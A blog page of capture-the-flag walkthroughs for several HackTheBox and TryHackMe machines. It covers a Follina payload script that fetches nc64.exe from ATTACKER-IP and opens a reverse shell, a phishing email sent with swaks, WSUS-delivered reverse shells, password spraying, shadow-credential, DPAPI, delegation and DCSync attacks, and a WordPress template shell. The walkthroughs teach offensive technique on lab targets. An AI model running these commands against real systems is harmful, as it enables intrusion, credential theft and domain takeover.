REAPSEC

Outdated

MOHIT SINGH PAPOLA — Fri, 23 Jan 2026 10:12:12 GMT

OVERVIEW

ENUMERATION

So we are given IP now let’s start the enumeration using Nmap

So this time aside from the regular ports we got a Port 25 opened running SMTP service so it might could give us some lead and also we got the Domain and DC name so don’t forget to add these into /etc/hosts file

But let’s start like always with Enumerating SMB through guest login as we don’t have user creds

nxc smb 10.129.229.239 -u guest -p '' --shares

As you can see we got a READ permission on Shares so let’s read it using smbclient

smbclient //10.129.229.239/Shares -U guest%''

so we got NOC_Reminder.pdf file let’s get it and see its contents

So we got a email itsupport@outdated.htb and we also got SMTP Port 25 opened and we are given a list of CVE’s to check it out so i checked most of them and the one that works is CVE-2022-30190 (Follina)

So in Short →
The Follina vulnerability exploits the msdt:// URL protocol to achieve code execution. John Hammond's video provided an excellent technical breakdown when this vulnerability was initially disclosed. The attack mechanism involves abusing Office documents that contain external references to attacker-controlled HTML files. These HTML files use JavaScript to redirect victims to malicious msdt:// URLs.

Under normal circumstances, the Microsoft Diagnostic Tool would display confirmation dialogs requiring user interaction. However, researchers discovered that URLs exceeding 4096 bytes bypass these security prompts.

EXPLOITATION

Now To exploit this vulnerability we will use John Hammond POC uploaded in its GitHub

CVE-2022-30190

Now before using this it is discovered that
The typical Follina attack uses Word documents to bypass security prompts, but this approach required modification since Word wasn't installed on the target system. Instead, a standalone HTML page with JavaScript was created (msdt.html) to redirect victims to the malicious msdt:// URL when they clicked the link sent to itsupport@outdated.htb.
Testing revealed additional complications: the email spam filter blocked URLs ending in .doc, preventing successful delivery of traditional payloads.
The final payload was adapted from John Hammond's POC code, specifically extracting the HTML generation component while excluding the Word document creation, web server, and reverse shell handling features that weren't needed for this scenario.

So follina.py will look like this after removing certain things

Don’t forget to open a python server on Port 80 where you have the nc64.exe file
```
  python3 -m http.server 80
```
Don’t forget to replace ATTACKER-IP with your IP

#!/usr/bin/env python3

import base64
import random
import string
import sys

if len(sys.argv) > 1:
    command = sys.argv[1]
else:
    command = "IWR http://ATTACKER-IP/nc64.exe -outfile C:\\programdata\\nc64.exe; C:\\programdata\\nc64.exe ATTACKER-IP 443 -e cmd"

base64_payload = base64.b64encode(command.encode("utf-8")).decode("utf-8")

# Slap together a unique MS-MSDT payload that is over 4096 bytes at minimum
html_payload = f""""
)

print(html_payload)

Now on running this script with python3 follina.py you will get a html code now copy that code and save it inside msdt.html file and be sure to keep msdt.html in the same folder where you started your python server and have nc64.exe file

Now open a listener on Port 443 in another terminal

rlwrap nc -lvnp 443

Now to make the server execute the msdt.html file using msdt:// parameter we will use swaks to send email to itsupport@outdated.htb
Be sure to change your IP below

swaks -t itsupport@outdated.htb -f 0xme0w@reapsec.com --header "Subject: Internal Request" --body "http://YOUR-IP/msdt.html"

This will now go to the SMTP server authenticate and send the email to itsupport@outdated.htb and it will request the msdt.html file from your python server, then request nc64.exe and results in giving a Foothold on our listener

So finally we got a reverse shell as the user btables and do type powershell to enter into powershell session/terminal

LATERAL MOVEMENT

After enumeration inside as btables user i didn’t find anything useful so let’s see bloodhound data for more information and since we don’t have a valid user creds we have to capture it from the inside
So let’s use SharpHound.exe to capture bloodhound data so we would import the SharpHound.exe tool inside the shell

iwr http://YOUR-IP/SharpHound.exe -OutFile SharpHound.exe

now run this inside the shell

.\SharpHound.exe -c all

Now wait for it to finish then if you remember we uploaded nc64.exe inside C:/programdata/
So we can use that to retrieve Bloodhound zip into our local machine

#In Windows Shell
\nc64.exe ATTACKER-IP PORT < 202..........zip

#In Attacker Machine
nc -lvnp PORT > 202.............zip

💡

Due to some issues I had to reset the machine so the new machine IP is not 10.129.15.123

Now we will see the data in Bloodhound

As you can see we got AddCredentialLink Permission so we could do a Shadow Credential Attack using Whisker.exe
So import the tool into the shell using the same Invoke-WebRequest Method and then

.\Whisker.exe add /target:sflowers

As you can see we got the certificate along with its password which we can use to get the TGT and NTLM hash using Rubeus as shown in the image above
So first import Rubeus.exe of latest version into the shell with same method and then copy the given Rubeus command, paste it and if it shows error then first paste into a text editor and remove the extra spaces so that on pasting it won’t cause issues or just Use AI to fix the format ;)

Now run the command as you already have Rubeus don’t forget to add .\ at the start of the copied command

USER FLAG

As you can see we got the NTLM Hash of the user sflowers so now let’s try login it using evil-winrm

evil-winrm -i 10.129.15.123 -u sflowers -H HASH

And you will get the user flag

PRIVILEGE ESCALATION

Now lets enumerate more for privilege escalation so on seeing the groups with whoami /all

We notice that sflowers is a member of WSUS Administrators group , seems suspicious so i ran winPEAS.exe in order to find anything extra

On running winPEAS.exe i found

So Researching about exploiting WSUS (Windows Server Update Services) I found this BLOG

In this blog it teaches us What is WSUS and How it works?
→ Windows Server Update Services (WSUS) is a centralized patch management system that downloads Microsoft updates once and distributes them to all Windows computers in a corporate network, eliminating the need for each machine to connect directly to the internet.

The vulnerability arises when an attacker compromises the WSUS server with administrative privileges. While WSUS only accepts Microsoft-signed binaries as payloads (like PsExec.exe or PowerShell.exe), attackers can abuse legitimate Microsoft tools by controlling the arguments passed to them.

For example, SharpWSUS can create a malicious "update" that uses the legitimate, signed PsExec.exe binary but passes malicious commands as arguments—such as creating administrator accounts or executing reverse shells.
Since WSUS communicates with nearly all computers in the network, this bypass network segmentation and allows lateral movement to otherwise isolated systems, including Domain Controllers.

The main limitation is that attackers must wait for target machines to check for updates, which could take minutes, hours, days, or weeks depending on the organization's patch deployment schedule.

So let’s use SharpWSUS.exe tool to exploit this to get a reverse shell and if you remember we already have PsExec64.exe in C:/Users/sflowers/Desktop/

.\SharpWSUS.exe create /payload:"C:\Users\sflowers\Desktop\PsExec64.exe" /args:"-accepteula -s -d C:/Users/sflowers/Desktop/nc64.exe -e cmd YOUR-IP 9002" /title:"MEOWTAKEOVER"

The update is made and we got the updateid so copy that /updateid for future commands

Now let’s open the listener in our terminal on port 9002 before approving the update

rlwrap nc -lvnp 9002

Now let’s approve the update to be installed in the client system

SharpWSUS.exe approve /updateid:YOUR-UPDATE-ID /computername:dc.outdated.htb /groupname:"MEOWTAKEOVER"

Now wait for some time to let the update be installed so in meantime you can use the check command to check the status that if the update is installed or not

SharpWSUS.exe check /updateid:YOUR-UPDATE-ID /computername:dc.outdated.htb /groupname:"MEOWTAKEOVER"

I ran the command after some time and It shows installed and if you check on your listener

ROOT FLAG

And you are a root user and now you can get the root flag !!

WE FINALLY DID IT !!!! CHALLENGE SOLVED !!

For Any Query Or Problem Either Leave A Comment Or Contact At reapsec.com

THANKS FOR READING !!!

Vintage

MOHIT SINGH PAPOLA — Thu, 08 Jan 2026 16:35:03 GMT

OVERVIEW

As you can see we got an IP and this time we are given starting credential of a valid user so let’s first start the enumeration with NMAP

ENUMERATION

The scan looks normal so let’s use the given credential in each service but before that don’t forget to add the domain and domain controller name into the /etc/hosts file

Now let’s check the SMB service

So as you can see that NTLM authentication is disabled so normal SMB authentication wont work so we switched upon Kerberos authentication using -k flag and it succeeded so we can list shares using this authentication

NOTE: Do change you /etc/krb5.conf earlier to avoid any problem in future as we know that this machine will use Kerberos Authentications so update the below in your /etc/krb5.conf file

[libdefaults]
    default_realm = VINTAGE.HTB
    dns_lookup_realm = false
    dns_lookup_kdc = true

[realms]
    VINTAGE.HTB = {
        kdc = 10.129.231.205
        admin_server = 10.129.231.205
    }

[domain_realm]
    .vintage.htb = VINTAGE.HTB
    vintage.htb = VINTAGE.HTB

So I checked the shares above using impacket-smbclient but didn’t get anything useful so let’s do RID cycling to enumerate users , computers , groups etc

nxc smb 10.129.231.205 -u P.Rosa -p 'Rosaisbest123' -k --rid-brute

So we got all users and computer/machine accounts so let’s make a list of them and save it to users.txt file and for passwords we will not use $ for machine accounts as you can see below (pwd.txt)

gMSA01
dc01
fs01
administrator
guest
krbtgt
m.Rossi
r.Verdi
l.Bianchi
g.Viola
c.Neri
p.Rosa
svc_sql
svc_ldap
svc_ark
c.Neri_adm
l.Bianchi_adm

Now we have users list so we can bruteforce these users with their same username to see if anyone is using their username as their passwords
(NOTE: I already sprayed the Rosaisbest123 password on this list and didn’t got anything)

nxc smb 10.129.231.205 -u users.txt -p pwd.txt -k --no-bruteforce --continue-on-success

so we found that FS01$ uses its username as its password
Now this can also be founded using bloodhound

bloodhound-python -u P.Rosa -p Rosaisbest123 -d vintage.htb -ns 10.129.231.205 -c ALL --zip

You can see that the machine account FS01$ belongs/MemberOf PRE-WINDOWS 2000 COMPATIBLE ACCESS@VINTAGE.HTB
So member of this group generally uses their usernames as their password so through that we can understand the above scenario

EXPLOITATION

Now we owned the FS01$ machine account let’s do the enumeration on bloodhound

As you can see FS01 being the member of Domain Computers can ReadGMSAPassword of GMSA01$@VINTAGE.HTB

So let’s use netexec to read GMSAPassword

nxc ldap 10.129.231.205 -u fs01$ -p fs01 -k --gmsa

We successfully got the NTLM Hash of the gMSA01$ machine account now let’s see again in bloodhound data

As you can see that GMSA01$ machine account has GenericWrite and AddSelf Permission on SERVICEMANAGERS@VINTAGE.HTB

So let’s add GMSA01$ account into SERVICEMANAGER group using bloodyAD

bloodyAD -d vintage.htb --host dc01.vintage.htb -u gmsa01$  -p "NTLM-HASH" -f rc4 -k add groupMember SERVICEMANAGERS 'gMSA01$'

You can easily do this by getting GMSA01$ TGT also then u don’t have to pass user and password hash or even format of the hash

Now we are added to SERVICEMANAGERS group let’s see what this group can do in bloodhound

As you can see SERVICEMANAGERS have GenericAll Write on three users and among three two of the users are enabled and one user svc_sql is disabled

Since SERVICEMANAGERS have GenericAll on these users we can enable this user and then kerberoast it

First let’s take gMSA01$ TGT to avoid future problems

getTGT.py vintage.htb/gMSA01$ -hashes :NTLM-HASH
export KRB5CCNAME=gMSA01$.ccache

Now let’s try removing the FALSE parameter from the svc_sql user using bloodyAD

bloodyAD -d vintage.htb --host dc01.vintage.htb -k remove uac 'svc_sql' -f ACCOUNTDISABLE

As you can see the account is successfully removed from the ACCOUNTDISABLE field now let’s target kerberoast it to get the hash of the three accounts
we will use targeted kerberoast attack

python3 targetedKerberoast.py -d vintage.htb -k --no-pass --dc-host dc01.vintage.htb

As you can see we get the svc_sql hash and other two hash too so let’s use john to crack these passwords

So as you can see we got the svc_sql password now let’s use this password to spray it on the usernames we got earlier maybe it could be reused somewhere

nxc smb 10.129.231.205 -k -u users.txt -p 'Zer0the0ne'

Here we go we got another user named as C.Neri let’s login it using evil-winrm as it is a member of Remote Management Users but since winrm normally uses NTLM authentication and this time it is disabled so let’s use the realm method so first grab C.Neri user TGT

getTGT.py vintage.htb/C.neri:'Zer0the0ne'
export KRB5CCNAME=C.neri.ccache

evil-winrm -i dc01.vintage.htb -r vintage.htb

NOTE: If you are getting KDC_REALM error do fix your /etc/krb5.conf file

USER FLAG

Now you can get your user flag

PRIVILEGE ESCALATION

Now Let’s start enumeration for escalating privileges so let’s see for stored credentials first as bloodhound didn’t show anything good for C.Neri user

cmdkey /list

It showed nothing because we need an Interactive session with a valid profile. The WinRM session is not an interactive session but rather a network logon
You can find a better explanation on Bitvise blog

So now we can use RunasCs tool to spawn an interactive session so let’s put it into the WinRM session so don’t forget to open a python server in the same directory as RunasCs tool then in WinRM shell do this

iwr http://YOUR-IP:PORT/RunasCs.exe -OutFile RunasCs.exe

.\RunasCs.exe C.Neri Zer0the0ne cmd.exe -r ATTACKERIP:PORT

On your listener you will get the interactive shell and then do the above cmdkey command again

As you can see the above stored credentials are of the user c.neri_adm so ,

We could use Invoke-WCMDump.ps1 to get the stored credentials but on transporting it from the system to shell is triggering the antivirus which is not allowing us to transfer the file into the shell So our second option is
To look for the Credential Encrypted Blob and DPAPI Master keys to generate a key that can decrypt the Credential blob and give us the plain text password

So we will go back to the evil-winrm shell terminal and then do this

cd C:/Users/C.Neri/appdata/roaming/Microsoft
gci -force

You will se two directories that are use of us
1) Credentials → It contains encrypted credential Blob which we need to download to crack it
2) Protect → It contains a SID directory which contain our master key which we needed to generate the key to crack the credentials

Now let’s go and download these files

cd C:/Users/C.Neri/appdata/roaming/Microsoft/Credentials
gci -force

You will get this Credential Blob so download it using

download C4BB96844A5C9DD45D5B6A9859252BA6
# it will show error but don't mind it let it be and then check where you started evil winrm session
# in that directory you will see your file when you do ls -la

You can match the file size yo ensure that you downloaded the file completely or not

Similarly download master keys too

cd C:/Users/C.Neri/appdata/roaming/Microsoft/Protect/S-1-5-21-4024337825-2033394866-2055507597-1115/
#(your SID directory may be different so go to that don't just copy)
gci -force
# Now download both master keys 
download 4dbf04d8-529b-4b4c-b4ae-8e875e4fe847
download 99cf41a3-a552-4cf7-a8d7-aca2d6f7339b

After you downloaded all three things let’s go to the directory where these files are downloaded and now we will use Impacket dpapi.py script to generate key using master keys and then will decrypt credential blob So let’s go

dpapi.py masterkey -file 4dbf04d8-529b-4b4c-b4ae-8e875e4fe847 -sid S-1-5-21-4024337825-2033394866-2055507597-1115
#Enter the password -> Zer0the0ne

After this you will get a decrypt key copy that key and do this

dpapi.py credential -file C4BB96844A5C9DD45D5B6A9859252BA6 -key 'YOUR-KEY'

If you face this Padding Error this means that this is not the master key we needed so then let’s try other one now
Follow above steps and change the file of master key above and get the new decrypt key and copy it and then again

dpapi.py credential -file C4BB96844A5C9DD45D5B6A9859252BA6 -key 'YOUR-KEY'

Here we go we got the C.Neri_adm user credentials now let’s see what this user can do in bloodhound

So We can see that C.NERI_ADM has GenericWrite and AddSelf rights on DelegatedAdmins group and

L.Bianchi_adm is a member of DelegatedAdmins and also a Domain Admin so we can do RBCD (Resource Based Constrained Delegation) on it by adding a account which has SPN enabled which in this case is FS01$ machine account and then we can impersonate DC / Domain Admins

So let’s do it

First we have to add C.Neri_adm into DelegatedAdmins group so that we can add FS01$ account into this group also
(Don’t forget to take the TGT for C.Neri_adm user)

bloodyAD -d vintage.htb --host dc01.vintage.htb -k add groupMember DELEGATEDADMINS 'C.neri_adm'

Now let’s add FS01$ machine account to DELEGATEDADMINS

bloodyAD -d vintage.htb --host dc01.vintage.htb -k add groupMember DELEGATEDADMINS 'fs01$'

Now take FS01$ TGT and export it

After it successfully added then we can start our impersonation of DC/Domain Admins But
We cannot impersonate the Administrator account, as it is restricted from network logins. The L.BIANCHI_ADM user account is also a member of Domain Admins So we can impersonate that user to perform the Delegation attack then get the ticket with an ALT SPN of HTTP and get a WinRM session as WinRM uses HTTP class rather then CIFS

So let’s impersonate either DC or directly L.Bianchi_adm user as it is the faster approach

getST.py -spn 'cifs/dc01.vintage.htb' -altservice 'HTTP/dc01.vintage.htb' -impersonate 'l.bianchi_adm' -k -no-pass -dc-ip 10.129.231.205 vintage.htb/fs01$

ROOT FLAG

export KRB5CCNAME=l.bianchi_adm@HTTP_dc01.vintage.htb@VINTAGE.HTB.ccache
evil-winrm -i dc01.vintage.htb -r vintage.htb

We successfully got in , now you can grab the root flag

WE FINALLY DID IT !!!! CHALLENGE SOLVED !!

For Any Query Or Problem Either Leave A Comment Or Contact At reapsec.com

THANKS FOR READING !!!

Manager

MOHIT SINGH PAPOLA — Sun, 04 Jan 2026 08:32:47 GMT

OVERVIEW

So Like always we got our IP Address so now let’s scan it using NMAP

ENUMERATION

So we have lot of ports so let’s enumerate each one of them one by one but don’t forget to add the Domain and DC name in your /etc/hosts file

Let’s start from Port 80 http website

I enumerated the webpage , tried finding directories , subdomains but didn’t got anything so let’s move on to the SMB service now and check Guest Login

nxc smb 10.129.53.136 -u guest -p ''
nxc smb 10.129.53.136 -u guest -p '' --shares

We successfully got the guest login and shares but none of them are of any use to us so now let’s try RID Cycling using --rid-brute to find users, groups etc

nxc smb 10.129.53.136 -u guest -p '' --rid-brute

There we go we got the users so let’s save them in a file named as users.txt

administrator
guest
krbtgt
dc01$
zhong
cheng
ryan
raven
jinWoo
chinHae
operator

Now there is a chance that the user is using its username as password so let’s try SMB bruteforce to check it

nxc smb 10.129.53.136 -u users.txt -p users.txt --continue-on-success --no-bruteforce

We got the user operator
I checked its shares permission and other services even bloodhound data but didn’t got anything useful so Now let’s try this user in MSSQL service

EXPLOITATION

mssqlclient.py manager.htb/operator:operator@manager.htb -dc-ip 10.129.53.136 -windows-auth

And it worked now let’s enumerate it.
On enumerating i found xp_dirtree command which is used to read file system directory let’s try it

EXEC XP_DIRTREE 'C:\' ,1, 1;

As you can see we can see the directories , now let’s try seeing the website directory as something might be there as we didn’t got anything useful from outside enumeration

EXEC XP_DIRTREE 'C:\inetpub\wwwroot' ,1, 1;

we can see a backup zip which might have some info so we can get it directly from the website

wget http://manager.htb/website-backup-27-07-23-old.zip

After unzipping the file we can see a .old-conf.xml file which might have something useful so let’s see it

And here we go we got the user Raven Password which we can use to get an Evil-winrm shell

USER FLAG

And we are in as Raven and now you can get the user flag

PRIVILEGE ESCALATION

Now for escalating privileges i decided to check for ADCS vulnerabilities so let’s run Certipy to find if there is any vuln or not (Certipy should be UpToDate )

certipy find -u raven -p 'REDACTED' -dc-ip 10.129.53.136 -vulnerable -stdout

And here we go we found ESC 7 vulnerability and Raven user have ManageCa rights as well as Enrollment Rights but don’t have Manage Certificate rights so let’s use ManageCa rights to grant Raven the rights

certipy ca -u Raven -p 'REDACTED' -dc-ip 10.129.53.136 -ca "manager-DC01-CA" -add-officer Raven

Now we can enable SubCA Template (Even if its already enabled still do it )

certipy ca -u Raven -p 'REDACTED' -dc-ip 10.129.53.136 -ca "manager-DC01-CA" -enable-template SubCA

Since SubCA template is now enabled let’s get the request id of the certificate which we need to issue by requesting certificate for administrator@manager.htb upn and don’t forget to save the key by pressing y

certipy req -u Raven -p 'REDACTED' -dc-ip 10.129.53.136 -ca "manager-DC01-CA" -template SubCA -upn administrator@manager.htb

So we got out request id which is 20 so now let’s issue certificate to this ID (Enter your REQ ID below instead of 20)

certipy ca -u Raven -p 'REDACTED' -dc-ip 10.129.53.136 -ca "manager-DC01-CA" -issue-request 20

As you can see the certificate is successfully issued to the request ID now the only thing is left to retrieve it and get the administrator.pfx

certipy req -u Raven -p 'REDACTED' -dc-ip 10.129.53.136 -ca "manager-DC01-CA" -retrieve 20

As you can see we got the administrator.pfx Now we can use it to get the administrator hash

certipy auth -pfx administrator.pfx -dc-ip 10.129.53.136 -domain manager.htb

If it show error regarding Clock Skew is too great do

sudo ntpdate 10.129.53.136

Now run the above command again

We will get the administrator hash now we can use it to get an evil-winrm session

ROOT FLAG

Now you can grab the root flag and solve the machine

WE FINALLY DID IT !!!! CHALLENGE SOLVED !!

For Any Query Or Problem Either Leave A Comment Or Contact At reapsec.com

THANKS FOR READING !!!

ColddBox: Easy Room on TryHackMe: Complete Walkthrough and Guide

MOHIT SINGH PAPOLA — Sat, 03 Jan 2026 17:35:38 GMT

LINK - https://tryhackme.com/room/colddboxeasy

OVERVIEW

We are given an IP Address Let’s scan it using NMAP

ENUMERATION

So we have two open ports PORT 80 and PORT 4512 of web and ssh respectively
Also we can see the website is running WordPress 4.1.31 so we can use wpscan on it

Let’s see the website first

There is a login page of WordPress let’s try default username and passwords

But it failed….

So Let’s enumerate directories using gobuster

gobuster dir -u http://10.66.155.139/ -w /usr/share/wordlists/dirb/common.txt -x php,txt

So there we have one /hidden directory let’s check it out

And we found three usernames which we can use to bruteforce the WordPress Login but first let’s run wpscan on the website maybe will find some vulnerable plugin or themes.

wpscan -v -e --url http://10.66.155.139/wp-login.php

And we found nothing useful so let’s bruteforce the passwords with our users using wpscan

wpscan -U users.txt -P /usr/share/wordlists/rockyou.txt --url http://10.66.155.139/

And we found the user c0ldd password now let’s login into the WordPress admin page with the given credentials

We are inside the WordPress site now let’s checkout editor tab in Appearance to see if we can edit some code to get reverse shell

There is 404 Template in the templates section which has 404.php which we can use to get reverse shell

So get the PHP PentestMonkey reverse shell script from revshells.com and paste it in here
Now open a netcat listener in your terminal

nc -lvnp PORT

Now click on Update and you will update the 404.php code

Now navigate to 404.php from the URL so that it can get executed and can give us reverse shell

http://10.66.155.139/wp-content/themes/twentyfifteen/404.php

Go to this site and you will automatically will get the reverse shell

Since we can’t read user.txt as we are not the user c0ldd But
Now we can read the wp-config.php from the /var/www/html directory which we saw in gobuster as it usually has some creds

Seems We were right there is MYSQL DB credential of the user c0ldd
I enumerated the MySQL but didn’t found anything useful rather then the hash of the passwords of the three users we found earlier as their passwords will only work in WordPress website so there is no point in cracking those.

USER FLAG

Then I remembered that this password can be reused somewhere and our PORT 4512 of ssh came into my mind so let’s try using these creds to login as c0ldd

ssh c0ldd@10.66.155.139 -p 4512

Here we go we were right and now you can grab user.txt from /home/c0ldd directory

PRIVILEGE ESCALATION / ROOT FLAG

Now let’s try to escalate privileges and like every time we will start from sudo -l command

And we found it three services that can help me escalating privileges you can either use vim or ftp to escalate privileges but i will here use ftp so

sudo ftp
!/bin/bash

And Like this you got the root flag too.

WE FINALLY DID IT !!!! CHALLENGE SOLVED !!

For Any Query Or Problem Either Leave A Comment Or Contact At reapsec.com

THANKS FOR READING !!!

Strutted

MOHIT SINGH PAPOLA — Sat, 03 Jan 2026 13:19:57 GMT

OVERVIEW

So we are given IP Address let’s start the enumeration using NMAP

ENUMERATION

Let’s analyze these ports specifically Port 80 and don’t forget to add strutted.htb into /etc/hosts

Here we can see there is an upload functionality but only JPG,JPEG,PNG,GIF formats are allowed and when we try to upload any other format it shows

Let’s see what happens when we upload a image file

We can see that it is saved in the directory _/_/file.png in which the middle id is temporary which can’t be guessed so can’t access other files rather then the one we uploads

In the main page the right side has a Download button which allows us to download a zip file so let’s download and unzip that zip file

We came to know that it is using Apache + Tomcat which means .jsp file are used and you will get a password for an admin user in tomcat-users.xml file which could be useful in future.
Let’s enumerate more in the /strutted directory

In /strutted directory there is a file named as pom.xml where we can see the struts version which is 6.3.0.1

In /strutted/src/main/java/org/strutted/htb/Upload.java file we can see:

The Upload functionality is checking whether the input is among these in short its checking each file headers/magic bytes that’s why we are not able to upload other files
It also checks for the File content type to be Image and blocks other content type. (Can Confirm By Capturing Request In Burpsuite)

So As we now know the struts version 6.3.0.1
Either found the CVE related to it and you will get the CVE-2024-53677

Or Either while enumerating through the directories you will end up in /strutted/target/maven-status/maven-compiler-plugin/compile/default-compile/inputFiles.lst file

So while finding exploits for this CVE you will end up on this GitHub repo REPO_LINK

But before exploiting the vulnerability let’s see what is it about, and to know in detail come to this LINK

ABOUT THE VULNERABILITY (CVE-2024-53677) (BRIEF)

Redelegate

MOHIT SINGH PAPOLA — Wed, 31 Dec 2025 09:14:51 GMT

OVERVIEW

So we are given IP of the machine let’s scan it using Nmap

ENUMERATION

So we see that Anonymous Login is allowed in FTP so let’s just dump all its contents and directories and also don’t forget to add the domain and DC name into /etc/hosts

To dump the content inside FTP server using anonymous login:

wget -m --no-passive ftp://anonymous:anonymous@10.129.234.50

You will get all the contents on your working directory

Let’s analyze each file one by one
So on analyzing CyberAudit.txt and TrainingAgenda.txt

Friday 18th October | 11.30 - 13.30 - 7 attendees
"Weak Passwords" - Why "SeasonYear!" is not a good password

So only 7 attendees means people are still using SeasonYear! type passwords and we also saw another Shared.kdbx file which is a Keepass 2.x file of which we could get its password by using John The Ripper tools as

keepass2john Shared.kdbx > keepass.hash

john --wordlist=/path-to-your-wordlist

Since we know that People are using SeasonYear! type passwords so let’s quickly create a custom wordlist pass.txt of these type of passwords according to seasons

SeasonYear!
Summer2024!
Winter2024!
Fall2024!
Spring2024!
Autumn2024!

NOTE: we used the year 2024 because its 2024 in the CyberAudit.txt as we saw above and if you try to crack the Shared.kdbx file using rockyou.txt then it will take ages to complete

now let’s try to crack Shared.kdbx file password using the above wordlist

john --wordlist=/path-to-pass.txt

So we got the password successfully and now let’s use kpcli to login into the file Shared.kdbx

kpcli --kdb=Shared.kdbx

Now since you are inside , now enumerate the directories using ls , cd commands and to see particular passwords use the show command such as show 0 , show 1 and so on….

The passwords are hidden under a red flag so to see them just copy them and paste somewhere or in a text editor

On enumerating the Shared.kdbx completely and getting all the passwords make a list of users and passwords differently to enumerate which service is working for which credentials

Payroll
Timesheet
Administrator
FTPUser
SQLGuest
WordPress Panel

SeasonYear!
Summer2024!
Winter2024!
Fall2024!
Spring2024!
Autumn2024!
cVkqz4bCM7kJRSNlgx2G
hMFS4I0Kj8Rcd62vqi5X
22331144
Spdv41gg4BlBgSYIW1gF
SguPZBKdRyxWzvXRWy6U
zDPBpaF4FywlqIv11vii
cn4KOEgsHqvKXPjEnSD9

Now we can use netexec to brute force the creds among services like FTP , SMB , MSSQL , LDAP , WINRM etc.

So none of them worked in services above except MSSQL

nxc mssql 10.129.234.50 -u users.txt -p pass.txt --continue-on-success --local-auth

Now I used mssqlclient.py to enumerate the sql server but couldn’t get any useful there to get us some lead so then i thought about —rid-brute using the MSSQL creds we got

nxc mssql 10.129.234.50 -u 'SQLGuest' -p 'zDPBpaF4FywlqIv11vii' --rid-brute --local-auth

Now there is a possibility of password reuse with the new users we got so let’s brute force the new users with our earlier pass.txt

nxc smb 10.129.234.50 -u new_users.txt -p pass.txt --continue-on-success

Here we go we got Marie.Curie user but we are not able to get a foothold through Marie.Curie and its shares are also not much of any use so let’s run bloodhound to see what is happening.

bloodhound-python -u Marie.Curie -p 'REDACTED' -d redelegate.vl -ns 10.129.234.50 -c ALL --zip

Now on seeing High Value Target from Owned Principles we see

Marie.Curie -> Member of HelpDesk@Redelegate.vl -> force change password -> Helen.Frost@Redelegate.vl

So that means we can change the password of Helen.Frost user and then can get a shell/foothold as Helen.Frost

bloodyAD -d redelegate.vl -u Marie.Curie -p 'REDACTED' --host dc.redelegate.vl set password Helen.Frost 'Password123!'

Password is changed successfully now let’s see if we can get the shell or not

Yep we can, So let’s use evil-winrm to get the shell and grab the user flag

USER FLAG

PRIVILEGE ESCALATION

Let’s see what privileges do we got by whoami /priv

SeMachineAccountPrivilege and SeEnabledDelegationPrivilege is Enabled
But we can’t either add machine account or dnsrecord as:

MachineAccountQuota is 0 and INSUFF_ACCESS_RIGHTS for adding DNS Record into a domain
(Usually this would be done through Marie.Curie Creds in order to Obtain NTLM HASH through responder but i am just showing that it is not allowed to add DNS Record in the domain irrespective of any user)

So let’s find another method to escalate privileges
Now In Bloodhound we saw that user Helen.Frost has Group Delegated Object Control

So, Helen.Frost user account is a member of the IT group, which has the GenericAll ACL on the FS01$ machine account.
We know we cannot add a DNS record and machine account from our previous enumeration. So we cannot configure unconstrained delegation because we need to force the machine to craft a Kerberos ticket, which isn't possible with an IP Address only; it requires SPN and DNS A record.

However, we can configure the FS01$ machine account to perform a full S4U2self + S4U2proxy (Constrained Delegation) attack on the DC$ machine account and use that service ticket to perform a DCSync attack

Since we have GenericAll on FC01$ machine account we can force change its password using TGT of Helen.Frost

getTGT.py redelegate.vl/helen.frost:'Password123!'

export KRB5CCNAME=helen.frost.ccache

bloodyAD -k --host 'dc.redelegate.vl' set password 'FS01$' 'Newpassword123!'

Now let’s configure FS01$ for TRUSTED_TO_AUTH_FOR_DELEGATION and AllowedToDelegateTo properties.
Let’s begin configuring

bloodyAD -d redelegate.vl -k --host "dc.redelegate.vl" add uac FS01$ -f TRUSTED_TO_AUTH_FOR_DELEGATION

bloodyAD -d redelegate.vl -k --host "dc.redelegate.vl" set object FS01$ msDS-AllowedToDelegateTo -v cifs/dc.redelegate.vl

Now take FS01$ TGT similarly like Helen.Frost

Now get Service Ticket and impersonate dc

getST.py -k -no-pass -spn cifs/dc.redelegate.vl -impersonate dc redelegate.vl/FS01$

export KRB5CCNAME=dc@cifs_dc.redelegate.vl@REDELEGATE.VL.ccache

Now let’s perform DC-Sync attack and grab Administrator Hash

secretsdump.py -k -no-pass dc.redelegate.vl -just-dc-user Administrator

We got the hash now use it to get a shell and grab the root flag

ROOT FLAG

WE FINALLY DID IT !!!! CHALLENGE SOLVED !!

For Any Query Or Problem Either Leave A Comment Or Contact At reapsec.com

THANKS FOR READING !!!

Authority

MOHIT SINGH PAPOLA — Sun, 28 Dec 2025 17:46:04 GMT

OVERVIEW

So we are given an IP address let’s scan it using Nmap

ENUMERATION

So we got so many open ports Let’s check them and don’t forget to add the Domain name in /etc/hosts file

I checked Port 80 and it is an IIS Windows Server and doesn’t have any hidden directories So now let’s check SMB Ports for Guest Login

Yes we can guest login and can see SMB shares so now let’s dump Development share on our machine for a good enumeration with smbclient

smbclient //authority.htb/Development -U guest%'' -c "prompt OFF;recurse ON;mget *"

Now After getting all the files let’s check them

We see four directories inside Ansible directory so it seems Ansible is the thing which we have to work upon first but we also see four other directories which hints us that these services might be used in this machine so after checking each directory and its files I found some useful things:

# A passphrase for the CA key.
ca_passphrase: SuP3rS3creT
ca_common_name: authority.htb

# ansible.cfg and ansible_inventory
remote_user = svc_pwm
ansible_user: administrator                                                     
ansible_password: Welcome1

# tomcat-users.xml.j2
"admin" password="T0mc@tAdm1n" roles="manager-gui"/>             
"robot" password="T0mc@tR00t" roles="manager-script"/>

None of them worked anywhere to get us some lead but it strongly indicates towards PWM configuration and it also gave us Tomcat admin password so it means that there must be another web page rather then that IIS Web Server at PORT 80 so i looked at my NMAP scan once again and i saw this

So navigating to PORT 8443 with https I saw this

Here it is PWM configuration login Now We have to find its password to change its Configuration So I started searching PWM directory inside Ansible Directory so in PWM/default/main.yml i found ansible vault encrypted keys and after arranging them i got this output:

#PWM ADMIN LOGIN
$ANSIBLE_VAULT;1.1;AES256
32666534386435366537653136663731633138616264323230383566333966346662313161326239
6134353663663462373265633832356663356239383039640a346431373431666433343434366139
35653634376333666234613466396534343030656165396464323564373334616262613439343033
6334326263326364380a653034313733326639323433626130343834663538326439636232306531
3438

#PWM ADMIN PASSWORD
$ANSIBLE_VAULT;1.1;AES256
31356338343963323063373435363261323563393235633365356134616261666433393263373736
3335616263326464633832376261306131303337653964350a363663623132353136346631396662
38656432323830393339336231373637303535613636646561653637386634613862316638353530
3930356637306461350a316466663037303037653761323565343338653934646533663365363035
6531

#LDAP ADMIN PASSWORD
$ANSIBLE_VAULT;1.1;AES256
